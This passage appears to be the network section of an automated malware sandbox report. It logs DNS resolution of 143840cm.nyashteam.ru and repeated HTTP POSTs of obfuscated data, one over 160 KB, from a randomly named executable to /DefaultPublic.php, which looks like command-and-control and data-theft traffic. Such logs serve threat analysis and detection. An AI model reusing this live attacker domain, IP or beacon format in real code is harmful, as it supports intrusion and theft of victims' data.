Nov 25, 2024 22:39:35.426126003 CET	50029	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:35.537194014 CET	80	50029	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:35.552180052 CET	50030	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:35.661112070 CET	80	50030	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:35.661567926 CET	50029	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:35.790333986 CET	50014	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:35.790874004 CET	50029	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:35.790921926 CET	50030	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:35.791611910 CET	50034	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:35.910964966 CET	80	50029	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:35.911041021 CET	50029	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:35.911346912 CET	80	50030	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:35.911392927 CET	50030	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:35.911492109 CET	80	50034	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:35.911582947 CET	50034	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:35.911921024 CET	50034	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:36.031908989 CET	80	50034	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:36.271037102 CET	50034	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:36.390981913 CET	80	50034	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:37.182209015 CET	80	50034	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:37.306967020 CET	50034	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:37.415941000 CET	80	50034	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:37.543641090 CET	50040	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:37.566749096 CET	50034	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:37.663796902 CET	80	50040	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:37.663872004 CET	50040	80	192.168.2.4	37.44.238.250

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 22:37:23.601632118 CET	55277	53	192.168.2.4	1.1.1.1
Nov 25, 2024 22:37:24.072146893 CET	53	55277	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 22:37:23.601632118 CET	192.168.2.4	1.1.1.1	0xf84a	Standard query (0)	143840cm.nyashteam.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 25, 2024 22:37:24.072146893 CET	1.1.1.1	192.168.2.4	0xf84a	No error (0)	143840cm.nyashteam.ru		37.44.238.250	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

143840cm.nyashteam.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:24.200252056 CET	273	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:24.552634954 CET	344	OUT	Data Raw: 00 06 04 00 06 0d 01 04 05 06 02 01 02 00 01 06 00 0b 05 0d 02 05 03 0c 01 07 0c 05 03 01 03 06 0d 51 06 5d 01 01 06 50 0e 03 07 54 00 0a 06 01 04 50 0b 0e 0f 53 05 00 05 01 07 04 04 57 07 0d 03 06 0e 08 00 04 04 54 0b 03 0c 0f 0f 0c 0f 00 06 54 Data Ascii: Q]PTPSWTTP\QQ\L~~cf`\aa[pBuO`Rc\`hJxodZlbC^Aws^~O~V@{mP}ba
Nov 25, 2024 22:37:25.563438892 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:25.654736042 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1348 Connection: keep-alive Data Raw: 56 4a 7d 58 6c 6e 64 5b 78 4c 5a 49 7e 62 77 49 69 74 6c 55 68 4e 61 0b 6e 73 74 4d 7d 62 7c 46 60 5d 53 40 6e 71 69 06 62 5f 74 4b 7e 5b 78 01 55 4b 71 41 74 61 7f 44 7f 72 79 05 6b 59 54 09 78 58 6c 40 7e 5d 6b 02 76 61 7d 07 74 71 6d 47 68 58 6a 01 6a 52 77 51 7f 64 63 02 75 76 7b 06 7c 5b 76 5a 7e 4e 61 00 6f 5e 77 5f 78 67 6c 06 7b 0b 7f 02 79 61 70 04 78 5d 6d 5c 68 59 74 00 6c 5e 64 03 7d 72 64 5e 61 07 6f 5b 7a 51 41 5b 7d 64 77 55 7d 71 53 0a 61 55 70 4e 6c 52 56 48 76 70 62 0c 6e 71 65 02 6a 52 6a 02 6c 07 7a 05 77 60 64 58 62 5f 64 04 77 4f 50 50 7e 5d 79 5f 77 04 7d 06 61 66 6f 50 7f 42 66 5c 77 6c 52 04 7f 5a 7c 02 6f 6f 70 5a 6c 63 76 01 7c 6d 7c 08 60 5e 7c 04 7e 62 76 09 7d 6e 73 0c 7a 6e 71 5c 69 4c 69 03 7b 5d 46 51 7f 6f 68 0b 6a 5e 7f 52 7e 5e 7a 07 78 0b 77 01 6f 61 60 02 6b 58 74 5e 7d 77 7f 41 7e 70 62 51 6d 63 7c 00 7e 4c 59 5b 60 63 65 51 7b 5c 79 01 77 66 64 00 7c 66 70 07 7d 76 69 42 77 5c 67 49 7f 4c 61 01 7d 77 58 40 7b 58 52 09 7d 63 59 04 77 62 5b 07 76 61 71 48 7c 71 [TRUNCATED] Data Ascii: VJ}Xlnd[xLZI~bwIitlUhNanstM}b\|F`]S@nqib_tK~[xUKqAtaDrykYTxXl@~]kva}tqmGhXjjRwQdcuv{\|[vZ~Nao^w_xgl{yapx]m\hYtl^d}rd^ao[zQA[}dwU}qSaUpNlRVHvpbnqejRjlzw`dXb_dwOPP~]y_w}afoPBf\wlRZ\|oopZlcv\|m\|`^\|~bv}nsznq\iLi{]FQohj^R~^zxwoa`kXt^}wA~pbQmc\|~LY[`ceQ{\ywfd\|fp}viBw\gILa}wX@{XR}cYwb[vaqH\|qbI~B\|@~gUuaU{\aG}^yywtNxY\|L{CsIz\Rzcn^tJxI\|I~r{uatJ\|lsE}wtB_SvBlNxRttpfza_}\|z{qPuMgDwalwabA^ftruMuKh\|lSw\|lB]`{R{xNfmxAtwZO~bP~S@zmPN}ryM\|^h}\|Z}`h\|wnxCUIxLdFqc\|wQ\|pu{sl}rdHt][B{qawvZ~fp}X[wrcI}rqMwf{Hx~MkGu\_ta_GaPKl^~IUJvqgzbm~`}xIRL{Y`O{CYHybVFzcTO{]NZx^oY}[{Nval~UskdxauaBU\lB]wN[RyryG}\|z_z\yvxBagx[L~Jx^~Nca~Yueh~zXwB`kslD{BcxprhmZvd\|~LvOzSYQa~CjrAPsIzQU~Rsik}_la`[Tq]\kcVDP{\|HUYvnooBRqYc}Qxvz^bexK}vtju}B`bcDh\v^kI}UlecPiZh]u\_wa~fzUAWjdDZ}d^TaVPYnKRdoNRppSUDyrlDxc~L~^ZZBZi`A[rMiZGjHV}_PwQsyo`RVnc@ULvtR`a\|\DXb`E[rMc[Liy[cTCZXpxSY]A{oSsAQA[oeEQ~AcUCh}TiZNWRy@jqe^ [TRUNCATED]
Nov 25, 2024 22:37:25.654778957 CET	269	IN	Data Raw: 45 56 61 05 05 51 5d 5f 7d 54 00 6b 54 7a 5d 5d 59 6e 60 75 5f 75 76 72 5e 6b 62 0a 46 52 70 63 57 51 64 07 55 61 07 0b 01 57 58 6a 49 56 61 0d 5b 54 64 6c 5d 79 5a 73 63 54 54 5e 01 6d 61 64 56 60 04 65 5e 56 73 6f 49 7f 74 0c 5e 7a 73 70 43 62 Data Ascii: EVaQ]_}TkTz]]Yn`u_uvr^kbFRpcWQdUaWXjIVa[Tdl]yZscTT^madV`e^VsoIt^zspCbm@js[~p{VhbNZpoXToW`LPrXEiodZbdq\\|EpXSUSqD]a\EZ]RSXoYSYk\|oo^\|^\Z{PNPco@SqOiZMmO^Tq\VccT{RVPy]FQiaBV~Jl]DiJEQ^RHU\|fSndpy_\|BpZTTVr@\e
Nov 25, 2024 22:37:26.022404909 CET	249	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 384 Expect: 100-continue
Nov 25, 2024 22:37:26.404103041 CET	384	OUT	Data Raw: 5a 5c 5a 58 5d 5a 55 5a 59 59 54 56 57 5b 55 5a 58 5a 5b 5d 59 51 56 48 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z\ZX]ZUZYYTVW[UZXZ[]YQVHZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#$3"<9$0X1%.#'<S/;<((3?"Z96 *"4+.&\%#P-$
Nov 25, 2024 22:37:26.447812080 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:26.907330036 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 25 1d 20 3e 2c 0a 30 2d 22 11 2a 3f 23 5f 32 3b 31 58 27 13 33 1b 21 1d 3d 58 27 3f 28 0d 23 3c 22 1d 29 3e 31 55 26 2e 2a 12 24 0b 2e 51 01 13 22 5f 35 20 2d 54 2f 0d 09 1a 25 16 20 41 25 57 3e 5e 3f 2e 27 52 22 23 0f 11 3c 0b 32 03 2f 2f 2c 11 2b 3b 06 07 2d 30 02 0b 21 3f 2e 5f 08 13 23 1d 29 59 38 0e 24 51 34 02 26 05 3f 55 21 03 31 0b 33 55 2d 54 36 3c 0a 04 29 2d 3f 05 22 2e 00 52 26 2d 2a 19 24 21 0e 0d 30 39 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: % >,0-"?#_2;1X'3!=X'?(#<")>1U&.$.Q"_5 -T/% A%W>^?.'R"#<2//,+;-0!?._#)Y8$Q4&?U!13U-T6<)-?".R&-*$!09"\ )P5UT
Nov 25, 2024 22:37:27.112405062 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1760 Expect: 100-continue
Nov 25, 2024 22:37:27.458170891 CET	1760	OUT	Data Raw: 5a 5e 5f 5b 5d 5b 50 50 59 59 54 56 57 5c 55 59 58 5f 5b 59 59 5c 56 40 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z^_[][PPYYTVW\UYX_[YY\V@ZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV Y3U.?*<\05,&"B8.;'T);(%,%)8(&\%#P-8
Nov 25, 2024 22:37:27.537733078 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:28.253985882 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 25 12 37 3d 0a 0e 27 2d 29 0d 3d 3c 27 5a 25 28 2d 1d 24 3d 2f 18 23 37 3d 5e 24 2f 2f 1b 34 02 31 06 3c 3d 31 54 24 00 22 12 33 0b 2e 51 01 13 22 13 21 0d 25 11 2c 20 34 06 25 2b 33 1b 25 21 25 07 2b 07 2c 0e 21 33 0c 00 28 21 2d 5a 2c 02 2c 10 2a 15 0e 02 2c 20 33 50 21 3f 2e 5f 08 13 20 0a 3d 3f 24 0f 24 34 3f 5e 25 5a 2b 1f 22 2a 00 16 33 1d 03 1c 21 02 23 1a 28 03 3f 01 21 10 04 53 24 2d 08 5a 27 32 33 1a 24 29 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: %7='-)=<'Z%(-$=/#7=^$//41<=1T$"3.Q"!%, 4%+3%!%+,!3(!-Z,,, 3P!?._ =?$$4?^%Z+"3!#(?!S$-Z'23$)"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:26.619879961 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:37:26.973841906 CET	1048	OUT	Data Raw: 5f 59 5f 5a 5d 5a 50 57 59 59 54 56 57 5d 55 52 58 55 5b 5b 59 5e 56 48 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _Y_Z]ZPWYYTVW]URXU[[Y^VHZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#$#"Z=*#'S8&1[!7<S/(;(8/(.[:%3?2;[<&\%#P-<
Nov 25, 2024 22:37:27.949363947 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:28.192981958 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:30.337615967 CET	276	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 162040 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:30.693675041 CET	12360	OUT	Data Raw: 5f 5a 5a 58 58 5c 55 56 59 59 54 56 57 58 55 5e 58 58 5b 5f 59 5b 56 46 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _ZZXX\UVYYTVWXU^XX[_Y[VFZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV Y0#%=:+'/%5$,S/8?U+?.X,%<=!#]+.&\%#P-<
Nov 25, 2024 22:37:30.814251900 CET	7416	OUT	Data Raw: 0d 23 32 1f 28 30 04 1e 2d 2f 11 21 3d 05 30 05 00 1e 02 15 0e 29 3d 08 37 3c 3c 17 04 2e 02 32 0e 53 1e 20 38 5b 1e 54 22 2b 3e 1b 33 56 0c 0e 0e 3d 1e 21 04 13 2f 23 3f 58 03 3c 3e 03 0f 29 38 56 28 0b 08 00 21 1c 0a 32 0b 3e 31 28 2c 5a 21 5b Data Ascii: #2(0-/!=0)=7<<.2S 8[T"+>3V=!/#?X<>)8V(!2>1(,Z![3Q4>/@;V?3[3![!'2 ;;608'6Q/=/-.)(0],1#/B$ $68= =]"">C2S),26.82:]9_::) 3'=16.".1'A?B$+ 0%%)/:>&/)P#-19/"W3V3
Nov 25, 2024 22:37:30.814352036 CET	2472	OUT	Data Raw: 3b 0b 1b 26 07 3e 2f 15 0e 30 3e 21 25 0c 22 3d 29 5b 33 1a 2a 3a 38 1e 03 0f 34 1a 23 29 56 25 08 32 02 0f 31 5a 06 17 38 19 1e 1e 08 03 19 53 23 28 0f 22 3c 0b 39 1d 35 3f 0a 5e 3f 3c 11 2e 0e 22 2d 33 30 3d 39 5f 3e 3d 24 38 30 04 3a 5a 3c 54 Data Ascii: ;&>/0>!%"=)[3:84#)V%21Z8S#("<95?^?<."-30=9_>=$80:Z<T&;0Y$.(?:@0:$>(28,$3 .^(6#;?%2)* 6&+ 6?(P*X55/!(]>)8&E0)&59Y(Y62&Z4_0?U# >R^P> :$["/<0-XW/!9'1-
Nov 25, 2024 22:37:30.814436913 CET	4944	OUT	Data Raw: 02 36 03 42 30 34 5c 1e 2b 3a 3f 06 01 04 22 07 08 2f 28 43 32 5e 3e 05 0c 3a 04 05 38 3d 30 19 25 2d 32 1f 33 03 12 5d 3c 3b 39 1c 3c 5b 06 06 38 43 32 3e 24 3f 34 15 23 59 0c 58 05 2e 04 35 26 3f 13 1e 0d 36 03 2e 06 5a 1b 13 3b 30 51 14 06 3f Data Ascii: 6B04\+:?"/(C2^>:8=0%-23]<;9<[8C2>$?4#YX.5&?6.Z;0Q?8+'4$;^<8+#?.$"8/Y7$?_7TR9[8S1X(3R$\%9(119-$+.P?")-=9$ 3[9^:=9 ?\9&0-V0.*2<YS_.RZ)3>(8?1<W?]?];P/?]ZB;164W?:
Nov 25, 2024 22:37:30.814455986 CET	2472	OUT	Data Raw: 38 21 20 21 0b 5c 0e 07 26 22 1f 23 32 2e 0a 35 38 0b 3e 26 3c 08 39 5d 06 30 2f 01 32 01 1a 3f 2f 55 3c 28 0e 02 17 39 37 06 30 14 31 3e 01 55 3d 0e 1a 39 0f 03 02 54 0d 04 31 00 30 21 0b 54 0d 03 01 1a 05 31 2b 31 3e 3d 3d 31 3e 3d 07 5b 3a 22 Data Ascii: 8! !\&"#2.58>&<9]0/2?/U<(9701>U=9T10!T1+1>==1>=[:"78%"1Z79-Y'C-]G''2V%XZ)> !:#:;W-^!\#?9?.=@2,9B\4094P4,+T=%3<' 4803\>8C!3(Y5^'Z/9*9Y8=-0<))1:_")-@%>[3;_,_ZQ5$>6
Nov 25, 2024 22:37:30.838777065 CET	4944	OUT	Data Raw: 21 32 34 05 3f 3b 3d 10 3e 39 22 32 3b 18 1c 1f 3e 06 11 30 05 2e 0c 0a 09 58 38 01 36 5e 26 5b 27 5e 3a 12 25 5a 20 0b 30 13 03 54 36 5b 16 3d 26 3b 32 58 3b 05 06 43 22 28 32 39 3b 06 2f 52 20 59 35 12 3f 3f 32 22 3c 59 21 18 0c 08 03 36 32 5a Data Ascii: !24?;=>9"2;>0.X86^&['^:%Z 0T6[=&;2X;C"(29;/R Y5??2"<Y!62Z1Z9!2+#\0;+R5T'.)4?2)$?3<>]?.(=<P8$+X=8=!V?X1:P&">S<Z0'>&^33>/<$&"<XY31+":3/9*88><_$;$9/15X6?5]
Nov 25, 2024 22:37:30.838836908 CET	2472	OUT	Data Raw: 07 3c 29 2c 0d 1d 32 25 38 0a 30 3c 26 5c 3c 06 32 0b 0f 1f 07 06 38 2c 0f 0e 1c 5b 26 54 26 2a 2f 2d 01 3d 00 04 19 59 34 57 0d 1b 3e 02 0f 11 3a 01 38 2e 29 2c 38 2e 33 19 1a 05 09 20 37 1e 08 03 0f 26 09 0a 59 30 27 12 0a 5e 28 3e 01 06 36 3e Data Ascii: <),2%80<&\<28,[&T&/-=Y4W>:8.),8.3 7&Y0'^(>6>>;Z.$U<>&Y-=X;X]8$31.'"#=X???W] ><!'0=9+9?/^? /4802#:R6??>0!"C$$(>2/Y-8"<-^:8Z7[4U='>8*^06,<;>Z
Nov 25, 2024 22:37:30.935065031 CET	4944	OUT	Data Raw: 29 1c 2d 2f 2e 41 3f 18 12 32 11 5c 34 06 0b 01 03 38 1c 21 08 24 04 11 06 29 27 31 32 2f 5d 2c 39 04 1e 43 34 3a 18 58 27 39 55 3f 3c 07 34 17 3f 3e 0f 1f 05 2d 34 3c 32 3a 3a 5e 0e 05 3f 25 3e 42 26 1e 33 06 09 51 3f 2c 0f 20 2a 58 04 3e 08 07 Data Ascii: )-/.A?2\48!$)'12/],9C4:X'9U?<4?>-4<2::^?%>B&3Q?, X>)%<%T1Y9"]U8];$<A9V1;0X92="-Y0/&>7837<39)-?.$QY6<S8[>^=3<%8??Y2-;3!,V=X7;WW"$U,<]\806$3107:X[X?>?!#;<3-1<;D)<9@-
Nov 25, 2024 22:37:30.935122967 CET	2472	OUT	Data Raw: 3c 22 3d 22 33 09 31 0f 31 22 3a 5e 0c 33 0c 07 34 57 30 1a 3b 2b 3f 01 27 30 1c 5c 28 2f 53 0a 0e 0c 3e 5a 3c 0c 3a 12 2e 5a 50 10 37 5d 0d 1c 30 1e 30 32 3a 34 25 23 3e 2c 0e 25 35 00 23 1c 3f 37 33 10 25 11 1a 1e 38 5d 21 28 0b 1d 03 1f 3f 2b Data Ascii: <"="311":^34W0;+?'0\(/S>Z<:.ZP7]002:4%#>,%5#?73%8]!(?+W?>X"-%]$WU?XZ::>9/>\=:#0-=2]7?-8$Z501/">4S^!_;<:?'-7.0"_'!0 _.0<2+99%4??]"1:5^)8/<14'0>=(Y4=9"[.&98
Nov 25, 2024 22:37:30.935162067 CET	2472	OUT	Data Raw: 2d 5d 1a 20 3c 28 59 5d 28 22 07 30 39 29 2f 00 3e 54 47 1b 34 5f 03 38 36 14 2a 28 30 34 2e 1d 36 3a 01 3d 32 5b 00 06 3a 5b 20 3c 2d 25 03 58 0a 02 04 3f 0a 31 20 31 39 58 25 54 00 02 0e 1c 25 00 0c 32 33 31 2f 1a 21 24 18 1b 3c 06 0e 28 08 20 Data Ascii: -] <(Y]("09)/>TG4_86*(04.6:=2[:[ <-%X?1 19X%T%231/!$<( X<2.%3Y:5201>W2-/^#:T%(Z"Q'.&'6.,>)-<4%1;:>?1,S3608/5 ^3<2:V-<1"XS[$!U$[==V=(\;<&%&2W<2E=6Y282P<,$/'?^#=<\"3>^
Nov 25, 2024 22:37:31.605783939 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:32.505794048 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:30.598079920 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1044 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:37:30.942369938 CET	1044	OUT	Data Raw: 5a 5b 5a 58 5d 50 50 57 59 59 54 56 57 58 55 5c 58 5c 5b 5c 59 51 56 40 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z[ZX]PPWYYTVWXU\X\[\YQV@ZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV 0#%(:3%$Z2%>"'8,8?(;(2Z-8_=T'+>&\%#P-
Nov 25, 2024 22:37:31.869162083 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:32.103615999 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:32.429589033 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:37:32.785919905 CET	1048	OUT	Data Raw: 5a 55 5f 58 58 5b 55 51 59 59 54 56 57 59 55 5c 58 55 5b 5f 59 5a 56 42 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZU_XX[UQYYTVWYU\XU[_YZVBZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV $#%?;'$_&6.6$88#)8?(2&:&'";_*.&\%#P-,
Nov 25, 2024 22:37:33.750293016 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:37:33.992778063 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:37:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:37:33.392748117 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1744 Expect: 100-continue
